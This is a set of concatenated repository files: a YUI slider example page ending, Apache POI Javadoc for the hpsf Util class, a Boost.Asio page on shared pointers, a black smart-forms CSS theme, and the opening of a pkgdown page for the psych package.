<li data-description="Use StyleSheet to adjust the CSS rules applying a page theme from user input">
<a href="../stylesheet/stylesheet-theme.html">Adjusting a Page Theme on the Fly</a>
</li>
<li data-description="Example Photo Browser application.">
<a href="../dd/photo-browser.html">Photo Browser</a>
</li>
<li data-description="Shows how to use Overlay's constrainment support, to limit the XY value which can be set for an Overlay.">
<a href="../overlay/overlay-constrain.html">Constrain Support</a>
</li>
</ul>
</div>
</div>
</div>
</div>
</div>
</div>
<script src="../assets/vendor/prettify/prettify-min.js"></script>
<script>prettyPrint();</script>
<script>
YUI.Env.Tests = {
examples: [],
project: '../assets',
assets: '../assets/slider',
name: 'slider-from-markup',
title: 'Creating a Slider from Existing Markup',
newWindow: '',
auto: false
};
YUI.Env.Tests.examples.push('slider-basic');
YUI.Env.Tests.examples.push('slider-from-markup');
YUI.Env.Tests.examples.push('slider-skin');
YUI.Env.Tests.examples.push('stylesheet-theme');
YUI.Env.Tests.examples.push('photo-browser');
YUI.Env.Tests.examples.push('overlay-constrain');
</script>
<script src="../assets/yui/test-runner.js"></script>
</body>
</html>
|
lib/docs/apidocs/org/apache/poi/hpsf/Util.html | setu9760/Jade_project_repo | <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!-- NewPage -->
<html lang="ru">
<head>
<title>Util (POI API Documentation)</title>
<link rel="stylesheet" type="text/css" href="../../../../stylesheet.css" title="Style">
</head>
<body>
<script type="text/javascript"><!--
if (location.href.indexOf('is-external=true') == -1) {
parent.document.title="Util (POI API Documentation)";
}
//-->
</script>
<noscript>
<div>JavaScript is disabled on your browser.</div>
</noscript>
<!-- ========= START OF TOP NAVBAR ======= -->
<div class="topNav"><a name="navbar_top">
<!-- -->
</a><a href="#skip-navbar_top" title="Skip navigation links"></a><a name="navbar_top_firstrow">
<!-- -->
</a>
<ul class="navList" title="Navigation">
<li><a href="../../../../overview-summary.html">Overview</a></li>
<li><a href="package-summary.html">Package</a></li>
<li class="navBarCell1Rev">Class</li>
<li><a href="class-use/Util.html">Use</a></li>
<li><a href="package-tree.html">Tree</a></li>
<li><a href="../../../../deprecated-list.html">Deprecated</a></li>
<li><a href="../../../../index-all.html">Index</a></li>
<li><a href="../../../../help-doc.html">Help</a></li>
</ul>
</div>
<div class="subNav">
<ul class="navList">
<li><a href="../../../../org/apache/poi/hpsf/UnsupportedVariantTypeException.html" title="class in org.apache.poi.hpsf"><span class="strong">Prev Class</span></a></li>
<li><a href="../../../../org/apache/poi/hpsf/Variant.html" title="class in org.apache.poi.hpsf"><span class="strong">Next Class</span></a></li>
</ul>
<ul class="navList">
<li><a href="../../../../index.html?org/apache/poi/hpsf/Util.html" target="_top">Frames</a></li>
<li><a href="Util.html" target="_top">No Frames</a></li>
</ul>
<ul class="navList" id="allclasses_navbar_top">
<li><a href="../../../../allclasses-noframe.html">All Classes</a></li>
</ul>
<div>
<script type="text/javascript"><!--
allClassesLink = document.getElementById("allclasses_navbar_top");
if(window==top) {
allClassesLink.style.display = "block";
}
else {
allClassesLink.style.display = "none";
}
//-->
</script>
</div>
<div>
<ul class="subNavList">
<li>Summary: </li>
<li>Nested | </li>
<li><a href="#field_summary">Field</a> | </li>
<li><a href="#constructor_summary">Constr</a> | </li>
<li><a href="#method_summary">Method</a></li>
</ul>
<ul class="subNavList">
<li>Detail: </li>
<li><a href="#field_detail">Field</a> | </li>
<li><a href="#constructor_detail">Constr</a> | </li>
<li><a href="#method_detail">Method</a></li>
</ul>
</div>
<a name="skip-navbar_top">
<!-- -->
</a></div>
<!-- ========= END OF TOP NAVBAR ========= -->
<!-- ======== START OF CLASS DATA ======== -->
<div class="header">
<div class="subTitle">org.apache.poi.hpsf</div>
<h2 title="Class Util" class="title">Class Util</h2>
</div>
<div class="contentContainer">
<ul class="inheritance">
<li>java.lang.Object</li>
<li>
<ul class="inheritance">
<li>org.apache.poi.hpsf.Util</li>
</ul>
</li>
</ul>
<div class="description">
<ul class="blockList">
<li class="blockList">
<hr>
<br>
<pre>public class <span class="strong">Util</span>
extends java.lang.Object</pre>
<div class="block"><p>Provides various static utility methods.</p></div>
<dl><dt><span class="strong">Author:</span></dt>
<dd>Rainer Klute (klute@rainer-klute.de)</dd></dl>
</li>
</ul>
</div>
<div class="summary">
<ul class="blockList">
<li class="blockList">
<!-- =========== FIELD SUMMARY =========== -->
<ul class="blockList">
<li class="blockList"><a name="field_summary">
<!-- -->
</a>
<h3>Field Summary</h3>
<table class="overviewSummary" border="0" cellpadding="3" cellspacing="0" summary="Field Summary table, listing fields, and an explanation">
<caption><span>Fields</span><span class="tabEnd"> </span></caption>
<tr>
<th class="colFirst" scope="col">Modifier and Type</th>
<th class="colLast" scope="col">Field and Description</th>
</tr>
<tr class="altColor">
<td class="colFirst"><code>static long</code></td>
<td class="colLast"><code><strong><a href="../../../../org/apache/poi/hpsf/Util.html#EPOCH_DIFF">EPOCH_DIFF</a></strong></code>
<div class="block">The difference between the Windows epoch (1601-01-01
00:00:00) and the Unix epoch (1970-01-01 00:00:00) in
milliseconds: 11644473600000L.</div>
</td>
</tr>
</table>
</li>
</ul>
<!-- ======== CONSTRUCTOR SUMMARY ======== -->
<ul class="blockList">
<li class="blockList"><a name="constructor_summary">
<!-- -->
</a>
<h3>Constructor Summary</h3>
<table class="overviewSummary" border="0" cellpadding="3" cellspacing="0" summary="Constructor Summary table, listing constructors, and an explanation">
<caption><span>Constructors</span><span class="tabEnd"> </span></caption>
<tr>
<th class="colOne" scope="col">Constructor and Description</th>
</tr>
<tr class="altColor">
<td class="colOne"><code><strong><a href="../../../../org/apache/poi/hpsf/Util.html#Util()">Util</a></strong>()</code> </td>
</tr>
</table>
</li>
</ul>
<!-- ========== METHOD SUMMARY =========== -->
<ul class="blockList">
<li class="blockList"><a name="method_summary">
<!-- -->
</a>
<h3>Method Summary</h3>
<table class="overviewSummary" border="0" cellpadding="3" cellspacing="0" summary="Method Summary table, listing methods, and an explanation">
<caption><span>Methods</span><span class="tabEnd"> </span></caption>
<tr>
<th class="colFirst" scope="col">Modifier and Type</th>
<th class="colLast" scope="col">Method and Description</th>
</tr>
<tr class="altColor">
<td class="colFirst"><code>static byte[]</code></td>
<td class="colLast"><code><strong><a href="../../../../org/apache/poi/hpsf/Util.html#cat(byte[][])">cat</a></strong>(byte[][] byteArrays)</code>
<div class="block">Concatenates the contents of several byte arrays into a
single one.</div>
</td>
</tr>
<tr class="rowColor">
<td class="colFirst"><code>static byte[]</code></td>
<td class="colLast"><code><strong><a href="../../../../org/apache/poi/hpsf/Util.html#copy(byte[], int, int)">copy</a></strong>(byte[] src,
int offset,
int length)</code>
<div class="block">Copies bytes from a source byte array into a new byte
array.</div>
</td>
</tr>
<tr class="altColor">
<td class="colFirst"><code>static void</code></td>
<td class="colLast"><code><strong><a href="../../../../org/apache/poi/hpsf/Util.html#copy(byte[], int, int, byte[], int)">copy</a></strong>(byte[] src,
int srcOffset,
int length,
byte[] dst,
int dstOffset)</code>
<div class="block">Copies a part of a byte array into another byte array.</div>
</td>
</tr>
<tr class="rowColor">
<td class="colFirst"><code>static long</code></td>
<td class="colLast"><code><strong><a href="../../../../org/apache/poi/hpsf/Util.html#dateToFileTime(java.util.Date)">dateToFileTime</a></strong>(java.util.Date date)</code>
<div class="block">Converts a <code>Date</code> into a filetime.</div>
</td>
</tr>
<tr class="altColor">
<td class="colFirst"><code>static boolean</code></td>
<td class="colLast"><code><strong><a href="../../../../org/apache/poi/hpsf/Util.html#equal(byte[], byte[])">equal</a></strong>(byte[] a,
byte[] b)</code>
<div class="block">Checks whether two byte arrays <var>a</var> and <var>b</var>
are equal.</div>
</td>
</tr>
<tr class="rowColor">
<td class="colFirst"><code>static boolean</code></td>
<td class="colLast"><code><strong><a href="../../../../org/apache/poi/hpsf/Util.html#equals(java.util.Collection, java.util.Collection)">equals</a></strong>(java.util.Collection<?> c1,
java.util.Collection<?> c2)</code>
<div class="block">Checks whether two collections are equal.</div>
</td>
</tr>
<tr class="altColor">
<td class="colFirst"><code>static boolean</code></td>
<td class="colLast"><code><strong><a href="../../../../org/apache/poi/hpsf/Util.html#equals(java.lang.Object[], java.lang.Object[])">equals</a></strong>(java.lang.Object[] c1,
java.lang.Object[] c2)</code>
<div class="block">Compares to object arrays with regarding the objects' order.</div>
</td>
</tr>
<tr class="rowColor">
<td class="colFirst"><code>static java.util.Date</code></td>
<td class="colLast"><code><strong><a href="../../../../org/apache/poi/hpsf/Util.html#filetimeToDate(int, int)">filetimeToDate</a></strong>(int high,
int low)</code>
<div class="block">Converts a Windows FILETIME into a <code>Date</code>.</div>
</td>
</tr>
<tr class="altColor">
<td class="colFirst"><code>static java.util.Date</code></td>
<td class="colLast"><code><strong><a href="../../../../org/apache/poi/hpsf/Util.html#filetimeToDate(long)">filetimeToDate</a></strong>(long filetime)</code>
<div class="block">Converts a Windows FILETIME into a <code>Date</code>.</div>
</td>
</tr>
<tr class="rowColor">
<td class="colFirst"><code>static byte[]</code></td>
<td class="colLast"><code><strong><a href="../../../../org/apache/poi/hpsf/Util.html#pad4(byte[])">pad4</a></strong>(byte[] ba)</code>
<div class="block">Pads a byte array with 0x00 bytes so that its length is a multiple of
4.</div>
</td>
</tr>
<tr class="altColor">
<td class="colFirst"><code>static char[]</code></td>
<td class="colLast"><code><strong><a href="../../../../org/apache/poi/hpsf/Util.html#pad4(char[])">pad4</a></strong>(char[] ca)</code>
<div class="block">Pads a character array with 0x0000 characters so that its length is a
multiple of 4.</div>
</td>
</tr>
<tr class="rowColor">
<td class="colFirst"><code>static char[]</code></td>
<td class="colLast"><code><strong><a href="../../../../org/apache/poi/hpsf/Util.html#pad4(java.lang.String)">pad4</a></strong>(java.lang.String s)</code>
<div class="block">Pads a string with 0x0000 characters so that its length is a
multiple of 4.</div>
</td>
</tr>
<tr class="altColor">
<td class="colFirst"><code>static java.lang.String</code></td>
<td class="colLast"><code><strong><a href="../../../../org/apache/poi/hpsf/Util.html#toString(java.lang.Throwable)">toString</a></strong>(java.lang.Throwable t)</code>
<div class="block">Returns a textual representation of a <code>Throwable</code>, including a
stacktrace.</div>
</td>
</tr>
</table>
<ul class="blockList">
<li class="blockList"><a name="methods_inherited_from_class_java.lang.Object">
<!-- -->
</a>
<h3>Methods inherited from class java.lang.Object</h3>
<code>clone, equals, finalize, getClass, hashCode, notify, notifyAll, toString, wait, wait, wait</code></li>
</ul>
</li>
</ul>
</li>
</ul>
</div>
<div class="details">
<ul class="blockList">
<li class="blockList">
<!-- ============ FIELD DETAIL =========== -->
<ul class="blockList">
<li class="blockList"><a name="field_detail">
<!-- -->
</a>
<h3>Field Detail</h3>
<a name="EPOCH_DIFF">
<!-- -->
</a>
<ul class="blockListLast">
<li class="blockList">
<h4>EPOCH_DIFF</h4>
<pre>public static final long EPOCH_DIFF</pre>
<div class="block"><p>The difference between the Windows epoch (1601-01-01
00:00:00) and the Unix epoch (1970-01-01 00:00:00) in
milliseconds: 11644473600000L. (Use your favorite spreadsheet
program to verify the correctness of this value. By the way,
did you notice that you can tell from the epochs which
operating system is the modern one? :-))</p></div>
<dl><dt><span class="strong">See Also:</span></dt><dd><a href="../../../../constant-values.html#org.apache.poi.hpsf.Util.EPOCH_DIFF">Constant Field Values</a></dd></dl>
</li>
</ul>
</li>
</ul>
<!-- ========= CONSTRUCTOR DETAIL ======== -->
<ul class="blockList">
<li class="blockList"><a name="constructor_detail">
<!-- -->
</a>
<h3>Constructor Detail</h3>
<a name="Util()">
<!-- -->
</a>
<ul class="blockListLast">
<li class="blockList">
<h4>Util</h4>
<pre>public Util()</pre>
</li>
</ul>
</li>
</ul>
<!-- ============ METHOD DETAIL ========== -->
<ul class="blockList">
<li class="blockList"><a name="method_detail">
<!-- -->
</a>
<h3>Method Detail</h3>
<a name="equal(byte[], byte[])">
<!-- -->
</a>
<ul class="blockList">
<li class="blockList">
<h4>equal</h4>
<pre>public static boolean equal(byte[] a,
byte[] b)</pre>
<div class="block"><p>Checks whether two byte arrays <var>a</var> and <var>b</var>
are equal. They are equal</p>
<ul>
<li><p>if they have the same length and</p></li>
<li><p>if for each <var>i</var> with
<var>i</var> >= 0 and
<var>i</var> < <var>a.length</var> holds
<var>a</var>[<var>i</var>] == <var>b</var>[<var>i</var>].</p></li>
</ul></div>
<dl><dt><span class="strong">Parameters:</span></dt><dd><code>a</code> - The first byte array</dd><dd><code>b</code> - The first byte array</dd>
<dt><span class="strong">Returns:</span></dt><dd><code>true</code> if the byte arrays are equal, else
<code>false</code></dd></dl>
</li>
</ul>
<a name="copy(byte[], int, int, byte[], int)">
<!-- -->
</a>
<ul class="blockList">
<li class="blockList">
<h4>copy</h4>
<pre>public static void copy(byte[] src,
int srcOffset,
int length,
byte[] dst,
int dstOffset)</pre>
<div class="block"><p>Copies a part of a byte array into another byte array.</p></div>
<dl><dt><span class="strong">Parameters:</span></dt><dd><code>src</code> - The source byte array.</dd><dd><code>srcOffset</code> - Offset in the source byte array.</dd><dd><code>length</code> - The number of bytes to copy.</dd><dd><code>dst</code> - The destination byte array.</dd><dd><code>dstOffset</code> - Offset in the destination byte array.</dd></dl>
</li>
</ul>
<a name="cat(byte[][])">
<!-- -->
</a>
<ul class="blockList">
<li class="blockList">
<h4>cat</h4>
<pre>public static byte[] cat(byte[][] byteArrays)</pre>
<div class="block"><p>Concatenates the contents of several byte arrays into a
single one.</p></div>
<dl><dt><span class="strong">Parameters:</span></dt><dd><code>byteArrays</code> - The byte arrays to be concatened.</dd>
<dt><span class="strong">Returns:</span></dt><dd>A new byte array containing the concatenated byte
arrays.</dd></dl>
</li>
</ul>
<a name="copy(byte[], int, int)">
<!-- -->
</a>
<ul class="blockList">
<li class="blockList">
<h4>copy</h4>
<pre>public static byte[] copy(byte[] src,
int offset,
int length)</pre>
<div class="block"><p>Copies bytes from a source byte array into a new byte
array.</p></div>
<dl><dt><span class="strong">Parameters:</span></dt><dd><code>src</code> - Copy from this byte array.</dd><dd><code>offset</code> - Start copying here.</dd><dd><code>length</code> - Copy this many bytes.</dd>
<dt><span class="strong">Returns:</span></dt><dd>The new byte array. Its length is number of copied bytes.</dd></dl>
</li>
</ul>
<a name="filetimeToDate(int, int)">
<!-- -->
</a>
<ul class="blockList">
<li class="blockList">
<h4>filetimeToDate</h4>
<pre>public static java.util.Date filetimeToDate(int high,
int low)</pre>
<div class="block"><p>Converts a Windows FILETIME into a <code>Date</code>. The Windows
FILETIME structure holds a date and time associated with a
file. The structure identifies a 64-bit integer specifying the
number of 100-nanosecond intervals which have passed since
January 1, 1601. This 64-bit value is split into the two double
words stored in the structure.</p></div>
<dl><dt><span class="strong">Parameters:</span></dt><dd><code>high</code> - The higher double word of the FILETIME structure.</dd><dd><code>low</code> - The lower double word of the FILETIME structure.</dd>
<dt><span class="strong">Returns:</span></dt><dd>The Windows FILETIME as a <code>Date</code>.</dd></dl>
</li>
</ul>
<a name="filetimeToDate(long)">
<!-- -->
</a>
<ul class="blockList">
<li class="blockList">
<h4>filetimeToDate</h4>
<pre>public static java.util.Date filetimeToDate(long filetime)</pre>
<div class="block"><p>Converts a Windows FILETIME into a <code>Date</code>. The Windows
FILETIME structure holds a date and time associated with a
file. The structure identifies a 64-bit integer specifying the
number of 100-nanosecond intervals which have passed since
January 1, 1601.</p></div>
<dl><dt><span class="strong">Parameters:</span></dt><dd><code>filetime</code> - The filetime to convert.</dd>
<dt><span class="strong">Returns:</span></dt><dd>The Windows FILETIME as a <code>Date</code>.</dd></dl>
</li>
</ul>
<a name="dateToFileTime(java.util.Date)">
<!-- -->
</a>
<ul class="blockList">
<li class="blockList">
<h4>dateToFileTime</h4>
<pre>public static long dateToFileTime(java.util.Date date)</pre>
<div class="block"><p>Converts a <code>Date</code> into a filetime.</p></div>
<dl><dt><span class="strong">Parameters:</span></dt><dd><code>date</code> - The date to be converted</dd>
<dt><span class="strong">Returns:</span></dt><dd>The filetime</dd><dt><span class="strong">See Also:</span></dt><dd><a href="../../../../org/apache/poi/hpsf/Util.html#filetimeToDate(long)"><code>filetimeToDate(long)</code></a>,
<a href="../../../../org/apache/poi/hpsf/Util.html#filetimeToDate(int, int)"><code>filetimeToDate(int, int)</code></a></dd></dl>
</li>
</ul>
<a name="equals(java.util.Collection, java.util.Collection)">
<!-- -->
</a>
<ul class="blockList">
<li class="blockList">
<h4>equals</h4>
<pre>public static boolean equals(java.util.Collection<?> c1,
java.util.Collection<?> c2)</pre>
<div class="block"><p>Checks whether two collections are equal. Two collections
C<sub>1</sub> and C<sub>2</sub> are equal, if the following conditions
are true:</p>
<ul>
<li><p>For each c<sub>1<em>i</em></sub> (element of C<sub>1</sub>) there
is a c<sub>2<em>j</em></sub> (element of C<sub>2</sub>), and
c<sub>1<em>i</em></sub> equals c<sub>2<em>j</em></sub>.</p></li>
<li><p>For each c<sub>2<em>i</em></sub> (element of C<sub>2</sub>) there
is a c<sub>1<em>j</em></sub> (element of C<sub>1</sub>) and
c<sub>2<em>i</em></sub> equals c<sub>1<em>j</em></sub>.</p></li>
</ul></div>
<dl><dt><span class="strong">Parameters:</span></dt><dd><code>c1</code> - the first collection</dd><dd><code>c2</code> - the second collection</dd>
<dt><span class="strong">Returns:</span></dt><dd><code>true</code> if the collections are equal, else
<code>false</code>.</dd></dl>
</li>
</ul>
<a name="equals(java.lang.Object[], java.lang.Object[])">
<!-- -->
</a>
<ul class="blockList">
<li class="blockList">
<h4>equals</h4>
<pre>public static boolean equals(java.lang.Object[] c1,
java.lang.Object[] c2)</pre>
<div class="block"><p>Compares to object arrays with regarding the objects' order. For
example, [1, 2, 3] and [2, 1, 3] are equal.</p></div>
<dl><dt><span class="strong">Parameters:</span></dt><dd><code>c1</code> - The first object array.</dd><dd><code>c2</code> - The second object array.</dd>
<dt><span class="strong">Returns:</span></dt><dd><code>true</code> if the object arrays are equal,
<code>false</code> if they are not.</dd></dl>
</li>
</ul>
<a name="pad4(byte[])">
<!-- -->
</a>
<ul class="blockList">
<li class="blockList">
<h4>pad4</h4>
<pre>public static byte[] pad4(byte[] ba)</pre>
<div class="block"><p>Pads a byte array with 0x00 bytes so that its length is a multiple of
4.</p></div>
<dl><dt><span class="strong">Parameters:</span></dt><dd><code>ba</code> - The byte array to pad.</dd>
<dt><span class="strong">Returns:</span></dt><dd>The padded byte array.</dd></dl>
</li>
</ul>
<a name="pad4(char[])">
<!-- -->
</a>
<ul class="blockList">
<li class="blockList">
<h4>pad4</h4>
<pre>public static char[] pad4(char[] ca)</pre>
<div class="block"><p>Pads a character array with 0x0000 characters so that its length is a
multiple of 4.</p></div>
<dl><dt><span class="strong">Parameters:</span></dt><dd><code>ca</code> - The character array to pad.</dd>
<dt><span class="strong">Returns:</span></dt><dd>The padded character array.</dd></dl>
</li>
</ul>
<a name="pad4(java.lang.String)">
<!-- -->
</a>
<ul class="blockList">
<li class="blockList">
<h4>pad4</h4>
<pre>public static char[] pad4(java.lang.String s)</pre>
<div class="block"><p>Pads a string with 0x0000 characters so that its length is a
multiple of 4.</p></div>
<dl><dt><span class="strong">Parameters:</span></dt><dd><code>s</code> - The string to pad.</dd>
<dt><span class="strong">Returns:</span></dt><dd>The padded string as a character array.</dd></dl>
</li>
</ul>
<a name="toString(java.lang.Throwable)">
<!-- -->
</a>
<ul class="blockListLast">
<li class="blockList">
<h4>toString</h4>
<pre>public static java.lang.String toString(java.lang.Throwable t)</pre>
<div class="block"><p>Returns a textual representation of a <code>Throwable</code>, including a
stacktrace.</p></div>
<dl><dt><span class="strong">Parameters:</span></dt><dd><code>t</code> - The <code>Throwable</code></dd>
<dt><span class="strong">Returns:</span></dt><dd>a string containing the output of a call to
<code>t.printStacktrace()</code>.</dd></dl>
</li>
</ul>
</li>
</ul>
</li>
</ul>
</div>
</div>
<!-- ========= END OF CLASS DATA ========= -->
<!-- ======= START OF BOTTOM NAVBAR ====== -->
<div class="bottomNav"><a name="navbar_bottom">
<!-- -->
</a><a href="#skip-navbar_bottom" title="Skip navigation links"></a><a name="navbar_bottom_firstrow">
<!-- -->
</a>
<ul class="navList" title="Navigation">
<li><a href="../../../../overview-summary.html">Overview</a></li>
<li><a href="package-summary.html">Package</a></li>
<li class="navBarCell1Rev">Class</li>
<li><a href="class-use/Util.html">Use</a></li>
<li><a href="package-tree.html">Tree</a></li>
<li><a href="../../../../deprecated-list.html">Deprecated</a></li>
<li><a href="../../../../index-all.html">Index</a></li>
<li><a href="../../../../help-doc.html">Help</a></li>
</ul>
</div>
<div class="subNav">
<ul class="navList">
<li><a href="../../../../org/apache/poi/hpsf/UnsupportedVariantTypeException.html" title="class in org.apache.poi.hpsf"><span class="strong">Prev Class</span></a></li>
<li><a href="../../../../org/apache/poi/hpsf/Variant.html" title="class in org.apache.poi.hpsf"><span class="strong">Next Class</span></a></li>
</ul>
<ul class="navList">
<li><a href="../../../../index.html?org/apache/poi/hpsf/Util.html" target="_top">Frames</a></li>
<li><a href="Util.html" target="_top">No Frames</a></li>
</ul>
<ul class="navList" id="allclasses_navbar_bottom">
<li><a href="../../../../allclasses-noframe.html">All Classes</a></li>
</ul>
<div>
<script type="text/javascript"><!--
allClassesLink = document.getElementById("allclasses_navbar_bottom");
if(window==top) {
allClassesLink.style.display = "block";
}
else {
allClassesLink.style.display = "none";
}
//-->
</script>
</div>
<div>
<ul class="subNavList">
<li>Summary: </li>
<li>Nested | </li>
<li><a href="#field_summary">Field</a> | </li>
<li><a href="#constructor_summary">Constr</a> | </li>
<li><a href="#method_summary">Method</a></li>
</ul>
<ul class="subNavList">
<li>Detail: </li>
<li><a href="#field_detail">Field</a> | </li>
<li><a href="#constructor_detail">Constr</a> | </li>
<li><a href="#method_detail">Method</a></li>
</ul>
</div>
<a name="skip-navbar_bottom">
<!-- -->
</a></div>
<!-- ======== END OF BOTTOM NAVBAR ======= -->
<p class="legalCopy"><small>
<i>Copyright 2014 The Apache Software Foundation or
its licensors, as applicable.</i>
</small></p>
</body>
</html>
|
myodd/boost/libs/asio/doc/html/boost_asio/overview/cpp2011/shared_ptr.html | FFMG/myoddweb.piger | <html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=US-ASCII">
<title>Shared Pointers</title>
<link rel="stylesheet" href="../../../../../../../doc/src/boostbook.css" type="text/css">
<meta name="generator" content="DocBook XSL Stylesheets V1.79.1">
<link rel="home" href="../../../index.html" title="Boost.Asio">
<link rel="up" href="../cpp2011.html" title="C++ 2011 Support">
<link rel="prev" href="atomic.html" title="Atomics">
<link rel="next" href="chrono.html" title="Chrono">
</head>
<body bgcolor="white" text="black" link="#0000FF" vlink="#840084" alink="#0000FF">
<table cellpadding="2" width="100%"><tr>
<td valign="top"><img alt="Boost C++ Libraries" width="277" height="86" src="../../../../../../../boost.png"></td>
<td align="center"><a href="../../../../../../../index.html">Home</a></td>
<td align="center"><a href="../../../../../../../libs/libraries.htm">Libraries</a></td>
<td align="center"><a href="http://www.boost.org/users/people.html">People</a></td>
<td align="center"><a href="http://www.boost.org/users/faq.html">FAQ</a></td>
<td align="center"><a href="../../../../../../../more/index.htm">More</a></td>
</tr></table>
<hr>
<div class="spirit-nav">
<a accesskey="p" href="atomic.html"><img src="../../../../../../../doc/src/images/prev.png" alt="Prev"></a><a accesskey="u" href="../cpp2011.html"><img src="../../../../../../../doc/src/images/up.png" alt="Up"></a><a accesskey="h" href="../../../index.html"><img src="../../../../../../../doc/src/images/home.png" alt="Home"></a><a accesskey="n" href="chrono.html"><img src="../../../../../../../doc/src/images/next.png" alt="Next"></a>
</div>
<div class="section">
<div class="titlepage"><div><div><h4 class="title">
<a name="boost_asio.overview.cpp2011.shared_ptr"></a><a class="link" href="shared_ptr.html" title="Shared Pointers">Shared Pointers</a>
</h4></div></div></div>
<p>
Boost.Asio's implementation can use <code class="computeroutput"><span class="identifier">std</span><span class="special">::</span><span class="identifier">shared_ptr</span><span class="special"><></span></code> and <code class="computeroutput"><span class="identifier">std</span><span class="special">::</span><span class="identifier">weak_ptr</span><span class="special"><></span></code> in preference to the Boost equivalents.
</p>
<p>
Support for the standard smart pointers is automatically enabled for <code class="literal">g++</code>
4.3 and later, when the <code class="literal">-std=c++0x</code> or <code class="literal">-std=gnu++0x</code>
compiler options are used, as well as for Microsoft Visual C++ 10. It may
be disabled by defining <code class="computeroutput"><span class="identifier">BOOST_ASIO_DISABLE_STD_SHARED_PTR</span></code>,
or explicitly enabled for other compilers by defining <code class="computeroutput"><span class="identifier">BOOST_ASIO_HAS_STD_SHARED_PTR</span></code>.
</p>
</div>
<table xmlns:rev="http://www.cs.rpi.edu/~gregod/boost/tools/doc/revision" width="100%"><tr>
<td align="left"></td>
<td align="right"><div class="copyright-footer">Copyright © 2003-2016 Christopher
M. Kohlhoff<p>
Distributed under the Boost Software License, Version 1.0. (See accompanying
file LICENSE_1_0.txt or copy at <a href="http://www.boost.org/LICENSE_1_0.txt" target="_top">http://www.boost.org/LICENSE_1_0.txt</a>)
</p>
</div></td>
</tr></table>
<hr>
<div class="spirit-nav">
<a accesskey="p" href="atomic.html"><img src="../../../../../../../doc/src/images/prev.png" alt="Prev"></a><a accesskey="u" href="../cpp2011.html"><img src="../../../../../../../doc/src/images/up.png" alt="Up"></a><a accesskey="h" href="../../../index.html"><img src="../../../../../../../doc/src/images/home.png" alt="Home"></a><a accesskey="n" href="chrono.html"><img src="../../../../../../../doc/src/images/next.png" alt="Next"></a>
</div>
</body>
</html>
|
public/assets/css/forms/smart-themes/black.css | solokco/estilotu |
/* @form header
----------------------------------- */
.smart-forms .header-black {
background-color:#505558;
border-top:1px solid #7E8689;
border-bottom:5px solid #333333;
}
.smart-forms .header-lite{ border-top-color:#7E8689; }
.smart-forms .header-lite:before{ background-color:#505558; }
.smart-forms .header-black h4{ color:#fff; }
/* @form tagline
--------------------------------- */
.smart-forms .theme-black .tagline span{ color:#505558; }
.smart-forms .theme-black .smart-link{ color:#505558; }
/* @hover | focus
--------------------------------- */
.smart-forms .theme-black .gui-input:hover,
.smart-forms .theme-black .gui-textarea:hover,
.smart-forms .theme-black .select > select:hover,
.smart-forms .theme-black .select-multiple select:hover,
.smart-forms .theme-black .gui-input:hover ~ .input-hint,
.smart-forms .theme-black .file .gui-file:hover + .gui-input,
.smart-forms .theme-black .gui-textarea:hover ~ .input-hint{ border-color: #6B7376; }
.smart-forms .theme-black .gui-input:focus,
.smart-forms .theme-black .gui-textarea:focus,
.smart-forms .theme-black .select > select:focus,
.smart-forms .theme-black .select-multiple select:focus{
border-color: #505558;
-webkit-box-shadow:0px 0px 3px #888888 inset;
-moz-box-shadow:0px 0px 3px #888888 inset;
-o-box-shadow:0px 0px 3px #888888 inset;
box-shadow:0px 0px 3px #888888 inset;
color: #3C3C3C;
}
.smart-forms .theme-black .gui-textarea:focus{ height: 120px; }
.smart-forms .theme-black .select > select:focus { z-index:10; z-index:20\9; }
.smart-forms .theme-black .gui-input:focus ~ .field-icon i,
.smart-forms .theme-black .gui-textarea:focus ~ .field-icon i{ color:#505558; }
.smart-forms .theme-black .select-multiple select:focus,
.smart-forms .theme-black .gui-input:focus ~ .input-hint,
.smart-forms .theme-black .gui-textarea:focus ~ .input-hint,
.smart-forms .theme-black .file .gui-file:focus + .gui-input{ border-color: #505558; }
.smart-forms .theme-black .select > select:focus + .arrow{ color:#505558; }
/* @star rating
--------------------------------------------------------------- */
.smart-forms .theme-black .rating:hover .rating-star:hover,
.smart-forms .theme-black .rating:hover .rating-star:hover ~ .rating-star,
.smart-forms .theme-black .rating-input:checked ~ .rating-star { color: #333333; }
.smart-forms .theme-black .rating-star,
.smart-forms .theme-black .rating:hover .rating-star { color: #A2A6A8; }
/* @check + radio black
---------------------------------------------------------------- */
.smart-forms .option-black input:hover + .checkbox,
.smart-forms .option-black input:hover + .radio{ border-color: #6B7376; }
.smart-forms .option-black input:checked + .checkbox,
.smart-forms .option-black input:focus + .checkbox,
.smart-forms .option-black input:checked + .radio,
.smart-forms .option-black input:focus + .radio{ border-color: #505558; }
.smart-forms .option-black input:checked + .radio:before,
.smart-forms .option-black input:focus + .radio:before{ background: #505558; }
.smart-forms .option-black input:checked + .checkbox:before,
.smart-forms .option-black input:focus + .checkbox:before{ border-color: #505558; }
/* @toggle-switch black
------------------------------------------------------------ */
.smart-forms .switch-black > input:checked + .switch-label { background: #505558; border-color: #505558; }
.smart-forms .switch-black > input:checked + .switch-label:after { color:#505558; }
.smart-forms .switch-black > input:checked:focus + .switch-label { background: #333333; border-color: #333333; }
/* @button black
------------------------------------------------------------- */
.smart-forms .btn-black { background-color: #505558; }
.smart-forms .btn-black:hover,
.smart-forms .btn-black:focus{ background-color: #6B7376; }
.smart-forms .btn-black:active{ background-color: #333333; }
.smart-forms .btn-black,
.smart-forms .btn-black:hover,
.smart-forms .btn-black:focus,
.smart-forms .btn-black:active{ color: #fff; text-shadow: 0 1px rgba(0, 0, 0, 0.08); }
/* @datepicker overides
-------------------------------------------------- */
.ui-datepicker .ui-datepicker-prev,
.ui-datepicker .ui-datepicker-next,
.ui-datepicker .ui-datepicker-title { color:#505558; }
.ui-datepicker-today a,
.ui-datepicker-today a:hover,
.ui-datepicker .ui-state-highlight { background:#505558!important; }
/* @price-box
------------------------------------------------------------- */
.smart-forms .theme-black .selected-box h4{ color:#505558; }
.smart-forms .ribbon-inner{ background:#505558; }
.smart-forms .ribbon-inner:before,
.smart-forms .ribbon-inner:after{ border-top-color:#333333; } |
docs/reference/cluster.loadings.html | personality-project/psych | <!-- Generated by pkgdown: do not edit by hand -->
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
